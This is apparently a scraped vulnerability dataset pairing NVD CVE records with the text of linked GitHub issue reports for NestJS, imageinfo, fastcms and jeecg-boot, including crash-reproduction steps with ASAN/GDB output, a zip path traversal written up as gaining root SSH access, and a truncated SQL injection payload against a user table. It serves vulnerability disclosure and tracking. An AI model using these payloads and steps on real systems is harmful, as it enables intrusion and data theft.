![image](https://user-images.githubusercontent.com/66824584/217627120-eaada60c-4afc-4f17-9dc7-4a96ce38d526.png) ![image](https://user-images.githubusercontent.com/66824584/217627155-dc177546-4582-4e64-a692-a83d5b67e8ca.png) ![image](https://user-images.githubusercontent.com/66824584/217627293-b916ebf6-c799-4df9-b497-a60cfb0ed96e.png) ![image](https://user-images.githubusercontent.com/66824584/217627310-00682d38-fb6b-42a6-9caf-f726e8d3acd0.png) ![image](https://user-images.githubusercontent.com/66824584/217627334-e81417d5-5aad-40e2-b5b2-3bb829f5d2e2.png) ![image](https://user-images.githubusercontent.com/66824584/217627351-7081dca5-e9de-4b33-a0fe-e0ffb5297402.png) ![image](https://user-images.githubusercontent.com/66824584/217627376-ace002f3-6c7b-47b6-873e-f8653b0ca0cf.png) ![image](https://user-images.githubusercontent.com/66824584/217627401-13f53eed-5e0f-419e-ae6f-a5e02705d7a0.png) ![image](https://user-images.githubusercontent.com/66824584/217627445-61d27171-700e-4790-b0a8-0aa1f2c3d624.png) ![image](https://user-images.githubusercontent.com/66824584/217627472-0dfe71e4-90e6-4c0c-8d1e-66182c7271cc.png) ![image](https://user-images.githubusercontent.com/66824584/217627493-b5f05a65-34bf-4252-8ae5-1b2ad2fb9d67.png)
fastjson 1.2.56 Deserialization Vulnerabilities
https://api.github.com/repos/CleverStupidDog/yf-exam/issues/3/comments
1
2023-02-08T19:07:25Z
2023-02-21T02:32:33Z
https://github.com/CleverStupidDog/yf-exam/issues/3
1,576,650,780
3
4,795
CVE-2023-26108
2023-03-06T05:15:12.690
Versions of the package @nestjs/core before 9.0.5 are vulnerable to Information Exposure via the StreamableFile pipe. Exploiting this vulnerability is possible when the client cancels a request while it is streaming a StreamableFile, the stream wrapped by the StreamableFile will be kept open.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nestjs/nest/issues/9759" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nestjs/nest/pull/9819" }, { "source": "report@snyk.io", "tags": [ "Patch" ], "url": "https://github.com/nestjs/nest/pull/9819/commits/f59cf5e81ca73bcdf1b5b36713550fd93918db41" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-NESTJSCORE-2869127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nestjs/nest/issues/9759" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/nestjs/nest/pull/9819" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/nestjs/nest/pull/9819/commits/f59cf5e81ca73bcdf1b5b36713550fd93918db41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-JS-NESTJSCORE-2869127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nestjs:nest:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "96A6F6F5-707C-41A2-A4D9-7CBE98ACEB0B", "versionEndExcluding": "9.0.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/nestjs/nest/issues/9759
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nestjs", "nest" ]
### Is there an existing issue for this? - [X] I have searched the existing issues ### Current behavior https://github.com/nestjs/nest/blob/d83edc32dd61b84ca759487dd4aa017069549ea8/packages/platform-express/adapters/express-adapter.ts#L81 When returning a StreamableFile from a controller, it seems the express adapter will .pipe() it to the express response stream. As you may know pipe method is somewhat deprecated because it does not properly closes streams in case of abnormal termination, newer code should prefer use [`pipeline`](https://nodejs.org/api/stream.html#streampipelinesource-transforms-destination-callback) which automatically closes source stream on destination stream error. So if a client cancels a request while it is streaming a StreamableFile, the stream wrapped by the StreamableFile will be kept forever opened, leading to a potential ressource leak. ### Minimum reproduction code WIP (see below) ### Steps to reproduce I am noticing the issue on a production app I am currently working on and I can't publish the code source without some adaptation effort to create the minimum reproduction code. In my setup I have an endpoint that streams images store on S3 using the official AWS S3 client and StreamableFile on the controller side. The S3 client use keep alive and a pool of sockets, so if a GetObject stream is not fully consumed it will leak the socket and prevent it to return it to the pool. I have a front that displays these images, and If I refresh the page several times quickly, it will cancel some in-flights requests on the server, but due to the .pipe behavior, some S3 Stream will not be destroyed. When the whole client pool is "poisoned", all S3 call will now hang forever, which is quite serious condition, only solved by restarting the nest server. I could work on a minimum reproduction code, but the above setup is already quite involved. Let me know if there is enough information, or how "minimal" the reproduction code should be in my case. ### Expected behavior StreamableFile should destroy the underlying stream not only on full consumption but also in case of error / early abortion of the consumer stream. This should be achievable easily by replacing `.pipe()` method by the `pipeline` function ### Package - [ ] I don't know. Or some 3rd-party package - [ ] <code>@nestjs/common</code> - [ ] <code>@nestjs/core</code> - [ ] <code>@nestjs/microservices</code> - [X] <code>@nestjs/platform-express</code> - [X] <code>@nestjs/platform-fastify</code> - [ ] <code>@nestjs/platform-socket.io</code> - [ ] <code>@nestjs/platform-ws</code> - [ ] <code>@nestjs/testing</code> - [ ] <code>@nestjs/websockets</code> - [ ] Other (see below) ### Other package _No response_ ### NestJS version 8.4.5 ### Packages versions ```json ``` ### Node.js version 16.15.0 ### In which operating systems have you tested? - [X] macOS - [ ] Windows - [ ] Linux ### Other _No response_
StreamableFile pipe can leak resources if response is closed/errored prematurely
https://api.github.com/repos/nestjs/nest/issues/9759/comments
6
2022-06-13T07:17:08Z
2022-06-24T07:29:44Z
https://github.com/nestjs/nest/issues/9759
1,269,010,651
9,759
4,796
CVE-2023-1190
2023-03-06T08:15:08.997
A vulnerability was found in xiaozhuai imageinfo up to 3.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file imageinfo.hpp. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-222362 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/imageinfo_poc" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaozhuai/imageinfo/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.222362" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.222362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/10cksYiqiyinHangzhouTechnology/imageinfo_poc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaozhuai/imageinfo/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.222362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.222362" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imageinfo_project:imageinfo:*:*:*:*:*:*:*:*", "matchCriteriaId": "906360E2-8A00-4C71-8A9C-1F0D7E74F637", "versionEndExcluding": null, "versionEndIncluding": "3.0.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/xiaozhuai/imageinfo/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xiaozhuai", "imageinfo" ]
[Project address](https://github.com/xiaozhuai/imageinfo) [afl_imageinfo](https://github.com/10cksYiqiyinHangzhouTechnology/imageinfo_poc/blob/main/imageinfo) [asan_imageinfo](https://github.com/10cksYiqiyinHangzhouTechnology/imageinfo_poc/blob/main/asan_imageinfo) [poc:id02](https://github.com/10cksYiqiyinHangzhouTechnology/imageinfo_poc/blob/main/id02) # Build original project ```bash cmake -B build . cmake --build build -- all cmake --build build -- check ``` # Build afl project ``` Cmakelist.txt add๏ผš set (CMAKE_C_COMPILER "/usr/local/bin/afl-clang-fast") set (CMAKE_CXX_COMPILER "/usr/local/bin/afl-clang-fast++") ``` # Run ``` ./imageinfo id02 ``` # 02 ## Vulnerability type READ memory access causes SEGV stack overflow. ## ASAN ```bash ubuntu@ubuntu:~/Desktop/imageinfo/imageinfo/build$ ./imageinfo ../../build/output/default/crashes/id\:000002\,sig\:11\,src\:000007\,time\:76911\,execs\:21200\,op\:havoc\,rep\:16 AddressSanitizer:DEADLYSIGNAL ================================================================= ==3079903==ERROR: AddressSanitizer: SEGV on unknown address 0x6110010000bc (pc 0x555555583ae4 bp 0x7fffffffd7e0 sp 0x7fffffffd230 T0) ==3079903==The signal is caused by a READ memory access. #0 0x555555583ae3 in {lambda(unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)#1}::operator()(unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&) const (/home/ubuntu/Desktop/imageinfo/imageinfo/build/imageinfo+0x2fae3) #1 0x5555555843c1 in _ZNSt17_Function_handlerIFbmR15IIReadInterfaceRlS2_RSt6vectorISt5arrayIlLm2EESaIS5_EEEUlmS1_S2_S2_S8_E_E9_M_invokeERKSt9_Any_dataOmS1_S2_S2_S8_ (/home/ubuntu/Desktop/imageinfo/imageinfo/build/imageinfo+0x303c1) #2 0x55555557cf11 in main (/home/ubuntu/Desktop/imageinfo/imageinfo/build/imageinfo+0x28f11) #3 0x7ffff7068082 in __libc_start_main ../csu/libc-start.c:308 #4 0x55555556adad in _start (/home/ubuntu/Desktop/imageinfo/imageinfo/build/imageinfo+0x16dad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/ubuntu/Desktop/imageinfo/imageinfo/build/imageinfo+0x2fae3) in {lambda(unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)#1}::operator()(unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&) const ==3079903==ABORTING ``` ## GDB ```bash ubuntu@ubuntu:~/Desktop/imageinfo/build$ gdb --args ./imageinfo output/default/crashes/id\:000002\,sig\:11\,src\:000007\,time\:76911\,execs\:21200\,op\:havoc\,rep\:16 GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2 Copyright (C) 2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./imageinfo... gdb-peda$ r output/default/crashes/id\:000002\,sig\:11\,src\:000007\,time\:76911\,execs\:21200\,op\:havoc\,rep\:16 Starting program: /home/ubuntu/Desktop/imageinfo/build/imageinfo output/default/crashes/id\:000002\,sig\:11\,src\:000007\,time\:76911\,execs\:21200\,op\:havoc\,rep\:16 Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x65cb60 --> 0x726c646821000000 ('') RBX: 0x6 RCX: 0x100007c RDX: 0x87 RSI: 0x4477a0 --> 0x0 RDI: 0x4477a0 --> 0x0 RBP: 0xf3000000 RSP: 0x7fffffffda10 --> 0x7fffffffda58 --> 0x65cb60 --> 0x726c646821000000 ('') RIP: 0x4113d1 (<std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2561>: mov esi,DWORD PTR [rax+rcx*1]) R8 : 0x1 R9 : 0x7fffffffda40 --> 0xf3 R10: 0x40456b --> 0x5f007465736d656d ('memset') R11: 0x7ffff7c61be0 --> 0x65cc50 --> 0x1a3809 R12: 0x7fffffffdbd0 --> 0xffffffffffffffff R13: 0xf0ffffe6 R14: 0x7fffffffdbd8 --> 0xffffffffffffffff R15: 0x4457b0 --> 0x4477a0 --> 0x0 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4113c8 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2552>: add bl,0x1 0x4113cb <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2555>: adc bl,0x0 0x4113ce <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2558>: mov BYTE PTR [rsi+rdx*1],bl => 0x4113d1 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2561>: mov esi,DWORD PTR [rax+rcx*1] 0x4113d4 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2564>: bswap esi 0x4113d6 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2566>: cmp DWORD PTR [rax+rcx*1+0x4],0x70727069 0x4113de <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2574>: jne 0x411358 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2440>: jne 0x411358 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2440> 0x4113e4 <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2580>: jmp 0x41138d <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2493>: jmp 0x41138d <std::_Function_handler<bool (unsigned long, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&), $_0>::_M_invoke(std::_Any_data const&, unsigned long&&, IIReadInterface&, long&, long&, std::vector<std::array<long, 2ul>, std::allocator<std::array<long, 2ul> > >&)+2493> [------------------------------------stack-------------------------------------] 0000| 0x7fffffffda10 --> 0x7fffffffda58 --> 0x65cb60 --> 0x726c646821000000 ('') 0008| 0x7fffffffda18 --> 0x8 0016| 0x7fffffffda20 --> 0x4 0024| 0x7fffffffda28 --> 0x0 0032| 0x7fffffffda30 --> 0x0 0040| 0x7fffffffda38 --> 0x0 0048| 0x7fffffffda40 --> 0xf3 0056| 0x7fffffffda48 --> 0x7ffff7b052f6 (<_IO_new_file_fopen+534>: mov rbx,rax) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV $_0::operator() (this=<optimized out>, length=0x417, ri=..., width=<optimized out>, height=<optimized out>, entrySizes=...) at /home/ubuntu/Desktop/imageinfo/imageinfo.hpp:498 498 uint32_t boxSize = buffer.readU32BE(offset); ``` ## Original code ```cpp off_t offset = 0; // typedef long _off_t; off_t offset = 0; off_t end = metaLength; while (offset < end) { uint32_t boxSize = buffer.readU32BE(offset); // uint32_t readU32BE; if (buffer.cmpAnyOf(offset + 4, 4, {"iprp", "ipco"})) { end = offset + boxSize; offset += 8; } else if (buffer.cmp(offset + 4, 4, "ispe")) { width = buffer.readU32BE(offset + 12); height = buffer.readU32BE(offset + 16); return true; } else { offset += boxSize; } } ```
Security Issue Report
https://api.github.com/repos/xiaozhuai/imageinfo/issues/1/comments
0
2023-02-26T12:29:02Z
2023-03-27T03:05:03Z
https://github.com/xiaozhuai/imageinfo/issues/1
1,600,041,028
1
4,797
CVE-2023-1191
2023-03-06T08:15:09.083
A vulnerability classified as problematic has been found in fastcms. This affects an unknown part of the file admin/TemplateController.java of the component ZIP File Handler. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222363.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ha1yuYiqiyinHangzhouTechn0logy/fastcms/blob/main/README.md" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/my-fastcms/fastcms/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.222363" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.222363" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ha1yuYiqiyinHangzhouTechn0logy/fastcms/blob/main/README.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/my-fastcms/fastcms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.222363" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.222363" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xjd2020:fastcms:-:*:*:*:*:*:*:*", "matchCriteriaId": "A67A406E-2F4F-4CAB-81F0-69EC395551D8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/my-fastcms/fastcms/issues/1
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "my-fastcms", "fastcms" ]
# Fastcms system has a zip package directory traversal vulnerability that allows for arbitrary file writing. And gain server privileges; Fastcms ็ณป็ปŸๅญ˜ๅœจzipๅŒ…็›ฎๅฝ•็ฉฟ่ถŠๅฏผ่‡ด็š„ไปปๆ„ๆ–‡ไปถๅ†™ๅ…ฅ๏ผŒๅนถ่Žทๅ–ๆœๅŠกๅ™จๆƒ้™๏ผ› [/fastcms/admin/template/install](https://www.xjd2020.com/fastcms/admin/template/install) This interface has a zip package directory traversal vulnerability that allows for arbitrary file writing. com/fastcms/cms/controller/admin/TemplateController.java ![image](https://user-images.githubusercontent.com/59911588/220809426-166b1f73-1717-4304-a7bb-b4e75cac28dd.png) The install method of DefaultTemplateService invoked the unzip method of FileUtils. com/fastcms/core/template/DefaultTemplateService.java ![image](https://user-images.githubusercontent.com/59911588/220809507-1e079228-3f20-4069-9ba1-dcc00fddcec4.png) The unzip method of FileUtils did not do any logical judgment on the decompressed zip package. com/fastcms/common/utils/FileUtils.java ![image](https://user-images.githubusercontent.com/59911588/220809549-cff3055e-6803-4f1d-9de2-06cd992deace.png) Create a zip package๏ผ› ![image](https://user-images.githubusercontent.com/59911588/220809566-207ae606-5b1e-4f18-9d93-d75869c64f7b.png) Uploading a zip package; ![image](https://user-images.githubusercontent.com/59911588/220809578-441a96ba-2aa1-4aa1-afc1-997ca6782191.png) Successfully logged in to ssh, successfully wrote the public key to the root/.ssh/authorized_keys file. ![image](https://user-images.githubusercontent.com/59911588/220809594-2e6fbb1a-fe04-469b-97d3-731125d6d80c.png)
Fastcms system has a zip package directory traversal vulnerability that allows for arbitrary file writing. And gain server privileges;
https://api.github.com/repos/my-fastcms/fastcms/issues/1/comments
3
2023-02-23T02:44:35Z
2023-02-28T12:50:25Z
https://github.com/my-fastcms/fastcms/issues/1
1,596,125,473
1
4,798
CVE-2023-24789
2023-03-06T16:15:10.187
jeecg-boot v3.4.4 was discovered to contain an authenticated SQL injection vulnerability via the building block report component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4511" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg:3.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "83D5D7DD-38EF-48F6-8C18-F75891A91B66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4511
[ "Exploit", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
Use the system default account password to log in to the system. In the visual design menu - report design, see Figure 1 for details. <img width="1512" alt="ๆˆชๅฑ2023-01-29 22 01 08" src="https://user-images.githubusercontent.com/32299945/215331278-68f86a40-1199-463a-b0f0-5441746c7eb1.png"> Then click New Report, see Figure 2 for details. <img width="1512" alt="ๆˆชๅฑ2023-01-29 22 03 48" src="https://user-images.githubusercontent.com/32299945/215331465-bb6f1bdf-d5c1-4c6a-a952-e34b2fd540ac.png"> Click the + sign to select a new SQL data set, see Figure 3 for details. <img width="1512" alt="ๆˆชๅฑ2023-01-29 22 07 51" src="https://user-images.githubusercontent.com/32299945/215331861-a06d00f7-f5d4-4bc8-9335-e4731f1b02a5.png"> Select and enter the corresponding data according to Figure 4, the payload is as follows: <img width="1512" alt="ๆˆชๅฑ2023-01-29 22 11 59" src="https://user-images.githubusercontent.com/32299945/215332242-94ca42ab-c4a7-4bd1-994f-1e98a42d0ec8.png"> payload:select * from sys_user WHERE id='' union SELECT 